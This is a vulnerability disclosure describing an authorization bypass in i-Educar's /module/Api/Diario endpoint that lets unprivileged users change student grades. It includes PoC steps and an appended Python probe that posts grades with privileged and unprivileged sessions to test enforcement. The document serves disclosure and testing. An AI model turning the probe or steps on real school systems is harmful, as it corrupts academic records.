Submission #625917: Portabilis i-Educar 2.10.0 Authorization Bypass (Info)

Title: Portabilis i-Educar 2.10.0 Authorization Bypass
Description: Broken Function Level Authorization (BFLA) allows unauthorized users to alter student grades

Summary
An API endpoint in i-Educar 2.9.0 is vulnerable to Broken Function Level Authorization (BFLA). An unauthorized user is able to modify student grades by directly accessing the /module/Api/Diario endpoint, bypassing permission controls. This leads to severe integrity issues, where anyone who knows the API's request format can tamper with academic records.

Details
The endpoint /module/Api/Diario does not enforce proper authorization checks to validate whether the calling user has the right to alter student grades. Even a user without any profile or assigned permissions can successfully submit a request and change the grades of students in the system. There is no validation of session roles or associated permissions before sensitive academic actions are executed.

PoC
1. Create a new user with no privileges.
2. Prepare a request to the /module/Api/Diario endpoint with the data to submit a student grade, using the low-privilege user's session cookie, then send the request.
Screenshot: https://github.com/CVE-Hunters/CVE/blob/main/images/bfla002.png?raw=true
Observe the result:
    {
      "oper": "post",
      "resource": "grades",
      "msgs": [{
        "msg": "Grades successfully posted!",
        "type": "success"
      }],
      "any_error_msg": false
    }

Impact
This is a Broken Function Level Authorization (BFLA) vulnerability, as categorized by OWASP API Security Top 10 (2023) - API5. The consequences include:
- Tampering with academic data without authorization.
- Loss of data integrity in school records.
- Potential legal and reputational damage for educational institutions.
Source: https://github.com/CVE-Hunters/CVE/blob/main/i-educar/Broken%20Function%20Level%20Authorization%20(BFLA)%20allows%20unauthorized%20users%20to%20alter%20student%20grades.md
User: nmmorette (UID 87361)
Submitted: 31/07/2025 01:02 (9 months ago)
Moderated: 09/08/2025 07:11 (9 days later)
Status: accepted
VulDB Entry: 319317 [Portabilis i-Educar up to 2.9.0 API Endpoint /module/Api/Diario privilege escalation]
Points: 20
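As an added check (not part of the submission above and not i-Educar's own code): a differential probe that sends the same grade-posting request once with a privileged session and once with a session that holds no profile or permissions, then reports whether the no-permission session receives the API's success envelope quoted in the PoC. The endpoint URL, the PHPSESSID cookie names and the placeholder form fields are assumptions; the actual grade parameters appear only in the submission's screenshot and must be copied from a captured legitimate grade post. The sample response bodies are constructed for offline use.

```python
"""Differential BFLA probe for an endpoint that should require a role.

The privileged run proves the request itself is well-formed, so a refusal
of the unprivileged run can be attributed to authorization rather than to
bad input. If the unprivileged run is accepted, function-level
authorization is not being enforced."""
import json
import urllib.parse
import urllib.request

# ASSUMPTION: local test instance; point this at the i-Educar host under test.
DEFAULT_ENDPOINT = "http://localhost/module/Api/Diario"

# Constructed response bodies. SAMPLE_ACCEPTED is the JSON quoted in the
# submission; SAMPLE_DENIED is a hypothetical refusal in the same envelope,
# used only to show what an enforced check is expected to look like.
SAMPLE_ACCEPTED = json.dumps({
    "oper": "post", "resource": "grades",
    "msgs": [{"msg": "Grades successfully posted!", "type": "success"}],
    "any_error_msg": False,
})
SAMPLE_DENIED = json.dumps({
    "oper": "post", "resource": "grades",
    "msgs": [{"msg": "Permission denied.", "type": "error"}],
    "any_error_msg": True,
})


def build_request(endpoint, session_cookie, form_fields):
    """Build a form-encoded POST that carries the given session cookie."""
    body = urllib.parse.urlencode(form_fields).encode()
    req = urllib.request.Request(endpoint, data=body, method="POST")
    req.add_header("Content-Type", "application/x-www-form-urlencoded")
    req.add_header("Cookie", session_cookie)
    return req


def classify_response(body):
    """Map the API envelope to 'accepted', 'rejected' or 'unknown'.

    A write counts as accepted only when the server reports no error and at
    least one success message; anything else is not proof of enforcement."""
    try:
        doc = json.loads(body)
    except ValueError:
        return "unknown"
    msgs = doc.get("msgs") or []
    types = {m.get("type") for m in msgs if isinstance(m, dict)}
    if doc.get("any_error_msg") is False and "success" in types:
        return "accepted"
    if doc.get("any_error_msg") is True or "error" in types:
        return "rejected"
    return "unknown"


def probe_bfla(send, endpoint, privileged_cookie, unprivileged_cookie, form_fields):
    """Send the identical write with both sessions; send(req) returns the body."""
    priv = classify_response(send(build_request(endpoint, privileged_cookie, form_fields)))
    unpriv = classify_response(send(build_request(endpoint, unprivileged_cookie, form_fields)))
    if unpriv == "accepted":
        verdict = "vulnerable"      # a no-permission session wrote grades
    elif priv == "accepted" and unpriv == "rejected":
        verdict = "enforced"
    else:
        verdict = "inconclusive"    # malformed request, expired session, etc.
    return {"privileged": priv, "unprivileged": unpriv, "verdict": verdict}


def http_send(req, timeout=10):
    """Real transport, used only when running against a live host."""
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8", "replace")


if __name__ == "__main__":
    # ASSUMPTION: "oper"/"resource" mirror the keys echoed in the response;
    # the remaining grade fields are only in the submission's screenshot, so
    # copy them from a captured legitimate grade post before running this.
    grade_fields = {"oper": "post", "resource": "grades"}
    result = probe_bfla(
        http_send, DEFAULT_ENDPOINT,
        privileged_cookie="PHPSESSID=<teacher-session-id>",     # assumption
        unprivileged_cookie="PHPSESSID=<no-profile-session-id>",  # assumption
        form_fields=grade_fields,
    )
    print(json.dumps(result, indent=2))
```

Run the probe against a disposable instance only: a "vulnerable" verdict means a real grade was written with the no-permission session, so use a test student and revert the record afterwards. The verdict is deliberately "inconclusive" when even the privileged session is refused, so that a malformed request is never mistaken for enforced authorization.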
